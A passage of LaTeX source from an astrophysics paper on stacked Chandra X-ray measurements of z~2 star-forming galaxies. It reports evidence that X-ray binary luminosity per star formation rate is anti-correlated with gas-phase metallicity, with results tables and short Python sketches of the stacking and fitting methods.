\T 4 & 50.5 & 12029 & 3.8e-4 & $40\pm13$ & $20.5^{+4.3}_{-6.8}$ & H$\alpha$, corr & $39.96^{+0.08}_{-0.18}$ \\
5 & 22.6 & 5422 & 2.3e-4 & $27^{+10}_{-9}$ & $24.4^{+11.7}_{-4.9}$ & H$\alpha$, corr & $39.95^{+0.17}_{-0.10}$ \\
\B 6 & 21.8 & 5576 & 3.9e-3 & $22^{+10}_{-9}$ & $17.5^{+5.6}_{-7.7}$ & H$\alpha$, corr & $39.84^{+0.12}_{-0.25}$ \\
\hline
\multicolumn{5}{l}{\textbf{Restricted sSFR: metallicity binning}} \\
\hline
\T 7a & 38.7 & 9245 & 5.8e-6 & $42\pm11$ & $27.4^{+7.0}_{-5.2}$ & H$\alpha$, corr & $40.12^{+0.10}_{-0.09}$ \\
8a & 21.1 & 5046 & 4.6e-4 & $25^{+9}_{-8}$ & $23.8^{+13.9}_{-6.2}$ & H$\alpha$, corr & $40.01^{+0.20}_{-0.13}$ \\
9a & 16.4 & 4080 & 9.2e-3 & $18^{+9}_{-8}$ & $21.4^{+8.8}_{-11.2}$ & H$\alpha$, corr & $39.77^{+0.15}_{-0.32}$\\
\\
7b & 27.3 & 6868 & 8.2e-6 & $32^{+10}_{-9}$ & $27.6^{+7.7}_{-5.6}$ & H$\alpha$ & $40.03^{+0.11}_{-0.10}$ \\
8b & 19.1 & 4513 & 1.6e-4 & $26^{+9}_{-8}$ & $32.1^{+8.8}_{-9.5}$ & H$\alpha$ & $40.04^{+0.11}_{-0.15}$ \\
9b & 15.6 & 3880 & 1.4e-2 & $16^{+9}_{-8}$ & $21.5^{+9.4}_{-11.9}$ & H$\alpha$ & $39.78^{+0.16}_{-0.35}$\\
\\
7c & 32.4 & 8004 & 5.0e-4 & $30\pm10$ & $23.1^{+8.0}_{-6.5}$ & SED & $40.08^{+0.13}_{-0.14}$ \\
8c & 21.8 & 5215 & 5.6e-4 & $24^{+9}_{-8}$ & $22.0^{+12.2}_{-4.4}$ & SED & $40.00^{+0.19}_{-0.10}$\\
\B 9c & 17.5 & 4587 & 2.6e-2 & $14^{+9}_{-8}$ & $13.1^{+1.5}_{-4.4}$ & SED & $39.71^{+0.05}_{-0.18}$\\
\hline
\multicolumn{5}{l}{\textbf{High sSFR: log(sSFR) $>-8.8$}} \\
\hline
\T 10 & 52.1 & 12656 & 2.4e-5 & $54\pm14$ & $25.8^{+5.8}_{-5.5}$ & H$\alpha$, corr & $39.84^{+0.09}_{-0.11}$ \\
\hline
\multicolumn{5}{l}{\textbf{High sSFR: redshift binning}} \\
\hline
\T 11 & 7.4 & 1717 & 8.1e-3 & $11^{+6}_{-5}$ & $16.7^{+4.6}_{-7.6}$ & H$\alpha$, corr & $39.63^{+0.11}_{-0.26}$ \\
\B 12 & 46.2 & 10939 & 2.9e-4 & $43\pm14$ & $29.8^{+8.0}_{-7.7}$ & H$\alpha$, corr & $39.91^{+0.10}_{-0.13}$ \\
\hline
\multicolumn{5}{l}{\textbf{High sSFR: metallicity binning}} \\
\hline
\T 13 & 37.3 & 8738 & 2.8e-3 & $30\pm12$ & $23.1^{+7.9}_{-6.2}$ & H$\alpha$, corr & $39.88\pm0.13$\\
\B 14 & 15.6 & 3731 & 3.5e-3 & $19^{+9}_{-8}$ & $26.4^{+6.4}_{-8.0}$ & H$\alpha$, corr & $39.71^{+0.09}_{-0.15}$\\
\hline \hline
\multicolumn{8}{p{6.0in}}{\T Notes:
(c) Total exposure multiplied by \textit{Chandra} effective area.
(e) Errors are based on Poisson statistics.
(h) Errors are based on bootstrapping.
} \\
\end{tabular}
\label{tab:xray}
\end{minipage}
\end{table*}
\subsection{Stacked Metallicity Measurements}
To maximize our sample size and reduce biases in our galaxy sample, in our stacking analysis we include galaxies with upper or lower limits on their oxygen abundance based on the O3N2 indicator. For parts of our analysis we split our sample into different $Z$ bins. In the highest $Z$ bin, we include galaxies with 12+log(O/H) lower limits higher than the bin's lower bound, and in the lowest $Z$ bin, we include galaxies with 12+log(O/H) upper limits lower than the bin's upper bound. Overall, for the 79 galaxies in our full sample, we have 59 O/H measurements, 18 upper limits, and 2 lower limits. \par
Due to the inclusion of upper and lower limits on 12+log(O/H), we cannot simply average the O/H values of the galaxies in each stack. Instead, using the method of \citet{sanders15}, we measure the stacked O/H by making composite spectra of the galaxies in each stack. Each galaxy spectrum was shifted to rest frame, converted from flux density to luminosity density, corrected for reddening assuming the \citet{cardelli89} attenuation curve, interpolated onto a common wavelength grid, and normalized by the H$\alpha$ luminosity.
Normalized composite spectra were created by taking the X-ray weighted ($\omega$) median value of the normalized spectra. Emission-line luminosities were measured from the composite spectra by fitting a flat continuum and Gaussian profiles to regions around emission features. Uncertainties were estimated using a Monte Carlo technique. When tested on the subset of galaxies with detections of all lines of interest, this stacking method robustly reproduces the X-ray weighted median line ratios of the galaxies in a stack. \par
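The stacking steps above (rest-frame shift, interpolation onto a common grid, H$\alpha$ normalization, weighted median) can be sketched as follows. The reddening correction and flux-to-luminosity conversion are omitted for brevity, and all names and the simple weighted-median implementation are illustrative:

```python
import numpy as np

def composite_spectrum(waves, lums, redshifts, lum_ha, xray_weights,
                       grid=np.arange(3700.0, 7000.0, 0.5)):
    """Weighted-median composite of normalized rest-frame spectra.

    Each spectrum is shifted to the rest frame, interpolated onto a
    common wavelength grid, and normalized by its H-alpha luminosity;
    the composite is the X-ray-weighted median at each grid point.
    """
    normed = []
    for wave, lum, z, lha in zip(waves, lums, redshifts, lum_ha):
        rest = np.asarray(wave) / (1.0 + z)          # shift to rest frame
        on_grid = np.interp(grid, rest, np.asarray(lum) / lha,
                            left=np.nan, right=np.nan)
        normed.append(on_grid)
    normed = np.array(normed)
    w = np.asarray(xray_weights, dtype=float)

    def weighted_median(vals, weights):
        ok = ~np.isnan(vals)
        if not ok.any():
            return np.nan
        order = np.argsort(vals[ok])
        v, ww = vals[ok][order], weights[ok][order]
        cum = np.cumsum(ww) / ww.sum()
        return v[np.searchsorted(cum, 0.5)]

    return grid, np.array([weighted_median(normed[:, i], w)
                           for i in range(grid.size)])
```

Line luminosities would then be measured from the returned composite by fitting Gaussian profiles, with errors from Monte Carlo perturbations of the input spectra.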
\section{Results and Discussion}
\label{sec:results}
\subsection{The redshift evolution of XRBs}
\label{sec:zevol}
We first investigate whether our galaxy sample supports the redshift evolution of $L_{\mathrm{X}}$/SFR of XRBs found by previous studies (e.g. \citealt{lehmer16}; \citealt{aird17}). We use X-ray stacks of our full $z\sim2$ sample as well as the subsample of galaxies with sSFR$>10^{-8.8}$ yr$^{-1}$. These high sSFR stacks should be dominated by HMXBs, while the full sample stacks likely contain significant contributions from both LMXBs and HMXBs, as discussed in more detail in \S\ref{sec:hmxb}. Since our galaxy sample is bimodally distributed in redshift due to atmospheric windows (see Figure \ref{fig:redshift}), we also split the galaxy sample between these two redshift intervals: $1.3<z<1.7$ and $2.0<z<2.6$. Information for all the aforementioned stacks is provided in rows \#$1-3$ and $10-12$ of Tables \ref{tab:prop} and \ref{tab:xray}. The full sample redshift stacks are represented by colored squares in Figure \ref{fig:lxzdep}, while the high sSFR stacks are shown by colored stars. \par
\begin{figure}
\centering
\includegraphics[width=0.5\textwidth]{LXSFRvsredshift.ps}
\vspace{0.25in}
\caption{Stacked $L_{\mathrm{X}}$/SFR values of our galaxy sample split into $z\sim1.5$ and $z\sim2.3$ redshift bins are shown by small squares/stars; squares represent stacks of the full galaxy sample, stars represent stacks of high sSFR (sSFR$>10^{-8.8}$ yr$^{-1}$) galaxies that are HMXB-dominated, and colors represent the weighted median oxygen abundance of the stacks. The larger square (star) symbol represents the combined $z\sim2$ stack of all (high sSFR) galaxies. The colored diamond and triangle represent local ($z=0$) measurements of the $L_{\mathrm{X}}$-SFR relation.
The long and short dashed lines show the redshift evolution of $L_{\mathrm{X}}$/SFR for the total XRB (dark gray) and HMXB-only (light gray) emission derived by \citet{lehmer16} and \citet{aird17}; since the \citetalias{lehmer16} total XRB evolution and the \citetalias{aird17} HMXB-only evolution are parametrized as non-linear relations between $L_{\mathrm{X}}$ and SFR, these curves have been normalized for SFR$=20 M_{\odot}$ yr$^{-1}$, the mean SFR of our $z\sim2$ galaxy sample. Our stacks lie above the $z=0$ measurements and are consistent with the redshift evolution measured by previous studies. }
\label{fig:lxzdep}
\end{figure}
In Figure \ref{fig:lxzdep}, we also show $L_{\mathrm{X}}$/SFR values measured by two studies (\citealt{lehmer10}; \citealt{mineo12}, hereafter \citetalias{lehmer10} and \citetalias{mineo12}, respectively) using samples of nearby galaxies at $z=0$. The \citetalias{mineo12} value is converted from the $0.5-8$ to $2-10$ keV band assuming $\Gamma=2.0$ and $N_{\mathrm{H}}=3\times10^{21}$ cm$^{-2}$, the average column density measured for their galaxy sample. Both the \citetalias{lehmer10} and \citetalias{mineo12} values are converted to be consistent with a Chabrier IMF. The 0.3 dex difference between these local values is likely due to sample selection effects. In fact, it is possible that the average metallicity of the galaxies in the \citetalias{lehmer10} and \citetalias{mineo12} samples differs significantly. Metallicity information is not available for all the galaxies in the \citetalias{lehmer10} or \citetalias{mineo12} samples. Therefore, we estimate the mean O/H for the \citetalias{lehmer10} sample using the $M_*-Z$ relation from \citet{kewley08} based on the O3N2 calibration by \citet{pettini04}, and by combining the O/H measurements for 19 of the \citetalias{mineo12} galaxies gathered by \citet{douna15} and estimates based on the $M_*-Z$ relation for the remaining 10 \citetalias{mineo12} galaxies. As shown by the colorbar in Figure \ref{fig:lxzdep}, we find that the mean O/H of the \citetalias{lehmer10} sample is much higher (12+log(O/H) $=8.71$) than the value for the \citetalias{mineo12} sample (12+log(O/H) $=8.57$). This difference could contribute to the discrepancy between these two local measurements of $L_{\mathrm{X}}$/SFR.
\par
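The band conversion quoted above can be reproduced analytically for an unabsorbed power law, whose energy flux in a band scales as $\ln(E_{\mathrm{hi}}/E_{\mathrm{lo}})$ when $\Gamma=2$. A minimal sketch (the $N_{\mathrm{H}}$ absorption correction applied in the text is not modeled here; that requires a full absorbed-spectrum model, e.g. in XSPEC):

```python
import numpy as np

def band_conversion(e1_lo, e1_hi, e2_lo, e2_hi, gamma=2.0):
    """Ratio of energy fluxes in band 2 to band 1 for an unabsorbed
    power law with photon index gamma (energy flux density ~ E^(1-gamma)).
    """
    def band_flux(lo, hi):
        if np.isclose(gamma, 2.0):
            return np.log(hi / lo)          # integral of E^-1
        p = 2.0 - gamma
        return (hi**p - lo**p) / p          # integral of E^(1-gamma)
    return band_flux(e2_lo, e2_hi) / band_flux(e1_lo, e1_hi)

# 0.5-8 keV -> 2-10 keV for Gamma = 2: ln(5)/ln(16) ~ 0.58
factor = band_conversion(0.5, 8.0, 2.0, 10.0)
```

Multiplying this factor by the NH-dependent absorption correction gives the full conversion applied to the \citetalias{mineo12} value.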
Both the $z\sim1.5$ and $z\sim2.3$ stacks lie above the local $L_{\mathrm{X}}$/SFR values, although due to the large error bars, the $z\sim1.5$ stacks are statistically consistent with the \citetalias{mineo12} local value. The $L_{\mathrm{X}}$/SFR of the $z\sim2.3$ stacks are higher than, but statistically consistent with, the $z\sim1.5$ stacks. The $L_{\mathrm{X}}$/SFR of the $z\sim2.3$ full sample stack is 2.3$\sigma$ higher than the \citetalias{mineo12} value of $3.7\times10^{39}$ erg s$^{-1}$ ($M_{\odot}$ yr$^{-1}$)$^{-1}$ and $3.1\sigma$ higher than the \citetalias{lehmer10} value of $1.6\times10^{39}$ erg s$^{-1}$ ($M_{\odot}$ yr$^{-1}$)$^{-1}$. \citet{fornasini18} find that for X-ray stacks with $\lesssim50$ galaxies such as these, $\langle L_{\mathrm{X}} \rangle$ may be biased to higher values than the true mean by 0.15 dex;\footnote{For small galaxy samples, $\langle L_{\mathrm{X}} \rangle$ can be biased to high values due to insufficient sampling of the XRB luminosity function.} however, even accounting for this possible systematic effect, the $z\sim2.3$ stacks have enhanced $L_{\mathrm{X}}$/SFR compared to the \citetalias{lehmer10} and \citetalias{mineo12} relations. Both the $z\sim1.5$ and $z\sim2.3$ full sample stacks are in good agreement with the $L_{\mathrm{X}}$/SFR values expected from the redshift evolution of the total X-ray binary (XRB) emission measured by \citet{lehmer16} (shown by the dark gray long-dashed line in Figure \ref{fig:lxzdep}; hereafter \citetalias{lehmer16}) and \citet{aird17} (shown by the dark gray short-dashed line; hereafter \citetalias{aird17}). \par
Both these previous studies also decompose the total XRB emission into an LMXB contribution proportional to $M_*$ and an HMXB contribution proportional to SFR; the latter is traced by the light gray lines in Figure \ref{fig:lxzdep}. The high sSFR stacks, which represent the most HMXB-dominated galaxies, are consistent (within 1.7$\sigma$) with the HMXB-only redshift evolution measured by \citetalias{lehmer16} and \citetalias{aird17}. Thus, our galaxy sample supports the redshift evolution of $L_{\mathrm{X}}$/SFR measured by other works.
\subsection{The metallicity dependence of XRBs}
\label{sec:zdep}
Having established that our $z\sim2$ galaxy sample does show enhanced $L_{\mathrm{X}}$/SFR relative to $z=0$ galaxies, we investigate whether this enhancement could be driven by the $Z$ dependence of HMXBs. We tried simultaneously splitting our sample by redshift and $Z$, but the resulting stacks do not have a sufficiently high signal-to-noise ratio to yield meaningful results. Therefore, we instead split our full sample with $1.3<z<2.6$ by $Z$, and find that splitting the sample into three bins with divisions at 12+log(O/H) $=8.3$ and 8.4 yields detections with $>2.5\sigma$ significance (see stacks \# $4-6$ in Tables \ref{tab:prop} and \ref{tab:xray}). \par
\begin{figure*}
\centering
\includegraphics[width=0.85\textwidth]{LXSFRvsZ_sSFRdep_v3.ps}
\vspace{0.5in}
\caption{$L_{\mathrm{X}}$/SFR versus oxygen abundance measurements for stacks of galaxies selected using different sSFR criteria, colored according to sSFR. The dotted line shows the local $L_{\mathrm{X}}$-SFR-$Z$ relation from \citetalias{brorby16} based on nearby galaxies spanning $7.0<$ 12+log(O/H) $<9.0$ with corresponding error shown in light gray. The mean of the six best-fitting models from \citetalias{fragos13b} is shown as a dash-dotted line, with the parameter space covered by these six models shown in dark gray. The best-fit model from \citetalias{madau17} is shown by a dashed line, and has been converted from the \citet{kk04} $R_{23}$ scale to the O3N2 scale from \citet{pettini04} using the conversion from \citet{kewley08}. Results for a restricted sSFR range that yields a similar sSFR distribution across all $Z$ are shown by circles; the $L_{\mathrm{X}}$/SFR of these stacks favors a $Z$-dependent model. Results for high sSFR stacks are shown by triangles; this sample provides the cleanest measurement of HMXB-only $L_{\mathrm{X}}$/SFR and is consistent with the local $L_{\mathrm{X}}$-SFR-$Z$ relation and some theoretical models.}
\label{fig:lxssfr}
\end{figure*}
These three $Z$ stacks show a slight hint of an anti-correlation between $L_{\mathrm{X}}$/SFR and O/H.
However, given the large statistical errors on $L_{\mathrm{X}}$, the $L_{\mathrm{X}}$/SFR values of all these bins are consistent within 1$\sigma$ with a constant ($Z$-independent) value. Thus, from these stacks, it is not possible to determine whether the redshift evolution of $L_{\mathrm{X}}$/SFR is driven by metallicity or some other factor since both a $Z$-dependent and $Z$-independent model can fit the data. \par
However, it is important to consider if systematic factors may impact this result. As mentioned in \S \ref{sec:sample}, a key variable which is known to affect $L_{\mathrm{X}}$/SFR is the sSFR \citep{lehmer10}. Since $L_{\mathrm{HMXB}}$ is correlated with SFR and $L_{\mathrm{LMXB}}$ is correlated with $M_*$, galaxies with lower sSFR have higher $L_{\mathrm{X}}$/SFR due to the larger fractional contribution of LMXBs to the X-ray emission. \par
The average sSFR and $Z$ of the three stacks based on our full sample are strongly anti-correlated. As reported in Table \ref{tab:prop}, the average sSFR of these three stacks spans 0.4 dex, and $L_{\mathrm{X}}$/SFR can vary by up to 0.3 dex over this sSFR range \citep{lehmer10}. Such variation is comparable in magnitude to the predicted decrease of $L_{\mathrm{X}}$/SFR with $Z$ for the $Z$ range probed by our stacks (\citealt{fragos13b}; \citealt{madau17}; hereafter \citetalias{fragos13b} and \citetalias{madau17}, respectively). Thus, $L_{\mathrm{X}}$/SFR could be inflated for the highest $Z$ stack due to its lower sSFR and deflated for the lowest $Z$ stack due to its higher sSFR. As a result, the fact that $Z$ and sSFR are anti-correlated could artificially mask the expected decrease of $L_{\mathrm{X}}$/SFR with $Z$. \par
Therefore, to reduce possible systematic effects associated with sSFR, we further restricted our sample to galaxies with $-9.3<$ log(sSFR) $<-8.4$, a range of sSFR values common across all $Z$. This sSFR-matching criterion reduces the spread of weighted average sSFR values of the stacks to 0.15 dex (see stacks \# $7a-9a$ in Tables \ref{tab:prop} and \ref{tab:xray}). The residual anti-correlation between $Z$ and sSFR that persists in the sSFR-restricted stacks may still slightly flatten the intrinsic $L_{\mathrm{X}}$-SFR-$Z$ relation, but the impact on the stacked $L_{\mathrm{X}}$/SFR should be $<0.1$ dex. \par
The resulting $L_{\mathrm{X}}$/SFR values versus $Z$ are shown by the circles in Figure \ref{fig:lxssfr}.
The sSFR-restricted stacks are not consistent within 1$\sigma$ uncertainties with a constant ($Z$-independent) $L_{\mathrm{X}}$/SFR value. We estimate the significance of the observed anti-correlation by calculating the probability that the data points are described by a power-law relation between $L_{\mathrm{X}}$/SFR and $Z$ with a negative index rather than an index $\geq$0. The probability that the data are consistent with a negative correlation between $L_{\mathrm{X}}$/SFR and $Z$ is 97\%. This result is robust to the statistical uncertainties in the stacked O/H values. Thus, this study provides the first direct evidence that the $L_{\mathrm{X}}$/SFR of XRBs at $z>0$ is anti-correlated with $Z$, although due to the low X-ray statistics, this conclusion is only supported with $\approx2\sigma$ confidence. \par
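A simplified version of this significance estimate: perturb each stacked $L_{\mathrm{X}}$/SFR within its error, fit a power law (a straight line in log-log space), and count the fraction of draws with a negative index. The sketch below assumes symmetric Gaussian errors and ignores the O/H uncertainties that the full calculation also propagates:

```python
import numpy as np

def prob_negative_slope(log_z, log_lxsfr, err, n_draw=10000, rng=0):
    """Probability that log(L_X/SFR) declines with log(O/H),
    estimated by Monte Carlo perturbation of the stacked values."""
    rng = np.random.default_rng(rng)
    x = np.asarray(log_z, dtype=float)
    y = np.asarray(log_lxsfr, dtype=float)
    e = np.asarray(err, dtype=float)
    neg = 0
    for _ in range(n_draw):
        yp = y + rng.normal(0.0, e)       # perturb within errors
        slope = np.polyfit(x, yp, 1)[0]   # power-law index in log-log space
        neg += slope < 0.0
    return neg / n_draw
```

With the three sSFR-restricted stack values and their asymmetric errors handled properly, this kind of calculation yields the 97\% probability quoted above.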
The redshift of the sSFR-restricted stacks is roughly anti-correlated with O/H. Therefore, one might worry that the $Z$ dependence we observe is caused by the redshift evolution of $L_{\mathrm{X}}$/SFR, rather than vice versa. However, the weighted average redshifts of the stacks vary by $<$0.2. As found by previous studies and confirmed by our redshift-binned stacks, $L_{\mathrm{X}}$/SFR evolves too slowly with redshift for such a small $z$ difference to account for the 0.35 dex difference in $L_{\mathrm{X}}$/SFR between our lowest and highest $Z$ stacks. Therefore, the $Z$ dependence we measure cannot be attributed to the small variation in redshift between our stacks. \par
The sSFR-restricted stacks are in good agreement with the best-fit theoretical models of \citetalias{fragos13b} and \citetalias{madau17}, which predict an anti-correlation between $L_{\mathrm{X}}$/SFR and $Z$. However, it should be noted that these models represent the X-ray emission of HMXBs alone, while our sSFR-restricted stacks likely include a significant LMXB contribution, and therefore some tension exists between our observations and these best-fit models (see \S\ref{sec:hmxb} for more details).\par
Based on the sSFR-restricted stacks alone, we cannot determine whether the observed anti-correlation between $L_{\mathrm{X}}$/SFR and $Z$ at $z\sim2$ is driven by HMXBs, LMXBs, or both. The X-ray luminosity of LMXB populations is expected to decrease with increasing $Z$ for the same reason as for HMXBs \citep{fragos13a}, but the oxygen abundance of H{\small II} regions is not an adequate proxy for the metallicity of LMXBs, which are associated with the old stellar population. Furthermore, the dependence of $L_{\mathrm{LMXB}}$ on the age of the stellar population is predicted to be much stronger than its dependence on $Z$ (\citetalias{fragos13b}; \citetalias{madau17}). Thus, $L_{\mathrm{LMXB}}$ is not expected to depend directly on gas-phase O/H, but if gas-phase O/H and mean stellar age are positively correlated at $z\sim2$, then the dependence of $L_{\mathrm{LMXB}}/M_*$ on age may contribute to the observed anti-correlation between $L_{\mathrm{X}}$/SFR and $Z$. In order for LMXBs to account for the majority of the observed trend, $L_{\mathrm{LMXB}}/M_*$ must be a factor of $\approx$7 higher in the lowest O/H stack compared to the highest O/H stack. According to the \citetalias{fragos13b} and \citetalias{madau17} LMXB models, such a large difference in $L_{\mathrm{LMXB}}/M_*$ could be explained by a mean stellar age difference of $\gtrsim2$ Gyr. However, the age of the Universe at $z\sim2$ is only 3.3 Gyr. Thus, it seems probable that HMXBs are responsible for at least a significant fraction of the observed anti-correlation between $L_{\mathrm{X}}$/SFR and $Z$. In \S\ref{sec:hmxb}, this hypothesis is tested more directly.
\subsection{Comparing HMXB populations at $z=0$ and $z\sim2$}
\label{sec:hmxb}
To determine whether the redshift evolution of HMXBs is driven by the $Z$ dependence of $L_{\mathrm{X}}$/SFR, we need to isolate the HMXB contribution to the observed XRB $Z$ dependence at $z\sim2$ and test whether it is the same as that measured in the local Universe.
To compare the normalization of the $L_{\mathrm{X}}$-SFR-$Z$ relation for HMXBs at $z\sim2$ and $z=0$, it is critical to minimize the absolute LMXB contribution by focusing on high sSFR galaxies. Isolating the HMXB contribution is necessary because the local relation has been determined using only HMXB-dominated galaxies with sSFR $>10^{-10}$ yr$^{-1}$ \citep{brorby16}. This high sSFR selection is also important for comparing our $z\sim2$ stacks to the \citetalias{fragos13b} and \citetalias{madau17} theoretical predictions that are based on the HMXB population alone. \par
As discussed in \S\ref{sec:sample}, while all the MOSDEF galaxies in our sample have sSFRs higher than the sSFR $>10^{-10}$ yr$^{-1}$ threshold used to select HMXB-dominated galaxies in the local Universe \citep{lehmer10}, this transition value increases with redshift due to the evolution of $L_{\mathrm{X}}$/SFR of HMXBs and $L_{\mathrm{X}}/M_*$ of LMXBs \citep{lehmer16}. Limiting our sample to log(sSFR) $>-8.8$, which is the approximate transition value found by \citet{lehmer16} at $z\sim2$, reduces the sample size by 50\%, resulting in very poor signal-to-noise in all but the lowest of the three $Z$ bins. Therefore, we combine galaxies in the middle $Z$ and high $Z$ bins to obtain a statistically meaningful second measurement. The $L_{\mathrm{X}}$/SFR values of the two high sSFR stacks are shown as triangles in Figures \ref{fig:lxssfr} and \ref{fig:lxhigh}, and the stack properties are provided in rows \# $13-14$ of Tables \ref{tab:prop} and \ref{tab:xray}. The $L_{\mathrm{X}}$/SFR values of the high sSFR stacks are lower than for the full sSFR and restricted sSFR samples, suggesting that there is a non-negligible LMXB contribution to the X-ray emission in the latter samples. Based on the differences between stacks with similar $Z$ but different $\langle \mathrm{sSFR} \rangle$, we estimate that $L_{\mathrm{X}}/M_*$ due to LMXBs is approximately $2-8\times10^{30}$ erg s$^{-1}$ $M_{\odot}^{-1}$. This $L_{\mathrm{X}}/M_*$ value is over an order of magnitude higher than local measurements for LMXB populations (\citealt{gilfanov04}; \citealt{colbert04}; \citealt{lehmer10}). However, this value is consistent with the predictions of the six best-fitting population synthesis models of \citet{fragos13a} for $z\sim2$ and the best model of \citet{madau17} for LMXB populations with stellar mass-weighted ages of $1.5-3$~Gyr. \par
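The LMXB estimate from pairs of stacks amounts to solving a two-component model, $L_{\mathrm{X}} = \alpha M_* + \beta\,\mathrm{SFR}$, so that $L_{\mathrm{X}}/\mathrm{SFR} = \alpha/\mathrm{sSFR} + \beta$; two stacks with similar $Z$ but different mean sSFR then determine $(\alpha,\beta)$. A sketch under those assumptions, ignoring measurement errors (the numbers in the usage note are synthetic, not the paper's stacks):

```python
import numpy as np

def decompose_xrb(lx_sfr1, ssfr1, lx_sfr2, ssfr2):
    """Solve L_X/SFR = alpha/sSFR + beta for two stacks, assuming
    L_X = alpha*M_* (LMXBs) + beta*SFR (HMXBs).

    Returns (alpha, beta) = (L_LMXB/M_*, L_HMXB/SFR).
    """
    a_mat = np.array([[1.0 / ssfr1, 1.0],
                      [1.0 / ssfr2, 1.0]])
    b_vec = np.array([lx_sfr1, lx_sfr2])
    alpha, beta = np.linalg.solve(a_mat, b_vec)
    return alpha, beta
```

For example, two hypothetical stacks at sSFR $=10^{-9}$ and $10^{-8.5}$ yr$^{-1}$ with $L_{\mathrm{X}}$/SFR of $10^{40}$ and $6.6\times10^{39}$ erg s$^{-1}$ ($M_{\odot}$ yr$^{-1}$)$^{-1}$ would imply $\alpha\approx5\times10^{30}$ erg s$^{-1}$ $M_{\odot}^{-1}$.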
The two high sSFR stacks favor a negative correlation between $L_{\mathrm{X}}$/SFR and $Z$ with 86\% confidence. While the significance of this result is not as high as for the restricted sSFR stacks, it suggests that the luminosity of HMXBs specifically, and not just XRBs generally, depends on $Z$ at $z\sim2$. The high sSFR stacks are consistent with the local $L_{\mathrm{X}}$-SFR-$Z$ relation and the lower $L_{\mathrm{X}}$/SFR bound of the \citetalias{fragos13b} population synthesis models. However, our high sSFR stacks exhibit significant ($>3\sigma$) tension with the upper $L_{\mathrm{X}}$/SFR bound of the \citetalias{fragos13b} models and the best-fit \citetalias{madau17} model. Some of this tension may be due to remaining uncertainties in the absolute calibration of SFR indicators at $z\sim2$ and the absolute metallicity scale.
\par
Figure \ref{fig:lxhigh} shows the high sSFR stacks as well as the $z\sim2$ high sSFR stack and local $L_{\mathrm{X}}$/SFR measurements from \citetalias{lehmer10} and \citetalias{mineo12}. We calculated the mean oxygen abundance of these local samples as described in \S\ref{sec:zevol}; since many of the oxygen abundance estimates are based on the $M_*-Z$ relation, we show the scatter of the $M_*-Z$ relation from \citet{kewley08} as horizontal error bars for these local points. As shown, both the discrepancy between the local $L_{\mathrm{X}}$/SFR measurements and the enhanced $L_{\mathrm{X}}$/SFR of the $z\sim2$ stack can be explained by the anti-correlation of $L_{\mathrm{X}}$/SFR and $Z$. If we combine the high sSFR $z\sim2$ stacks with at least one of the mean $L_{\mathrm{X}}$/SFR values measured for $z=0$, then an anti-correlation between $L_{\mathrm{X}}$/SFR and $Z$ is favored at $>99.7\% (>3\sigma)$ confidence. The significance of this trend established by combining mean measurements at $z\sim2$ and $z=0$ is comparable to the significance of the trend measured by \citetalias{brorby16} using individually detected galaxies at $z=0$.\par
Thus, we find that the $Z$ dependence of the $L_{\mathrm{X}}$/SFR of HMXBs at $z\sim2$ is consistent with that measured for $z=0$ and some theoretical models. This result provides the first direct link between the observed redshift evolution of $L_{\mathrm{X}}$/SFR and the $Z$ dependence of HMXBs.
\begin{figure*}
\centering
\includegraphics[width=0.85\textwidth]{LXSFRvsZ_highsSFR.ps}
\caption{$L_{\mathrm{X}}$/SFR versus stacked oxygen abundance for stacks of high sSFR (sSFR $>10^{-8.8}$ yr$^{-1}$) galaxies split by O/H are shown by triangles. A stack of all-sSFR galaxies at $z\sim2$ is shown by a four-point star. These stacks provide the cleanest measurement of HMXB-only $L_{\mathrm{X}}$/SFR. They are consistent with the local $L_{\mathrm{X}}$-SFR-$Z$ relation and the lower theoretical predictions from \citetalias{fragos13b}. These stacks are inconsistent with the \citetalias{madau17} model and the upper bound of \citetalias{fragos13b} models at $3\sigma$ confidence. The diamonds show local measurements of $L_{\mathrm{X}}$/SFR from \citet{lehmer10} and \citet{mineo12}; our estimates of the mean O/H values for these samples are described in \S\ref{sec:zevol}. The lines shown in this figure are as described in the caption for Figure \ref{fig:lxssfr}. }
\label{fig:lxhigh}
\end{figure*}
\subsection{The impact of different SFR indicators}
\label{sec:sfrindicator}
\begin{figure*}
\centering
\includegraphics[width=0.85\textwidth]{LXSFRvsZ_sSFR_comparison.ps}
\caption{$L_{\mathrm{X}}$/SFR versus stacked oxygen abundance for our galaxy sample restricted by sSFR. The top axis shows the corresponding metallicity in solar units ($Z_{\odot}=0.0142$) assuming a solar abundance pattern. Orange diamonds and red circles represent results based on H$\alpha$ SFRs assuming $Z=0.02$ and $Z=0.004$, respectively; the 1$\sigma$ error bars for these points are very similar, so only one set is shown for clarity. Dark blue squares and light blue triangles represent results based on SED SFRs, assuming $Z=0.02$ and the \citet{calzetti00} attenuation curve for the former, and $Z=0.004$ and the SMC attenuation curve for the latter. All SFR indicators favor an anti-correlation between $L_{\mathrm{X}}$/SFR and $Z$, but with different significance as discussed in \S\ref{sec:sfrindicator}. The lines shown in this figure are as described in the caption for Figure \ref{fig:lxssfr}.}
\label{fig:lxsfrdiff}
\end{figure*}
A key source of systematic uncertainty which may impact our results is the choice of SFR indicator. Different SFR indicators probe different star formation timescales and it is debated how different indicators evolve with redshift. As described in \S\ref{sec:hasfr}, for our default SFR measurements, we use H$\alpha$ SFRs with a $Z$-dependent $L_{\mathrm{H}\alpha}$-SFR conversion factor. In this section, we explore how adopting different SFR indicators would impact our results. \par
Figure \ref{fig:lxsfrdiff} displays $L_{\mathrm{X}}$/SFR as a function of $Z$ based on different SFR indicators. Although we consider six different SFR indicators (see \S\ref{sec:sed}-\ref{sec:hasfr} for details), for simplicity we only show four of them in Figure \ref{fig:lxsfrdiff}, which provide a representative view of the impact of different SFR indicators. Since SED-derived SFRs that adopt a delayed-$\tau$ SFH are consistent within 0.1 dex with those that adopt a constant SFH, we only discuss results based on the assumption of constant SFH.
\par
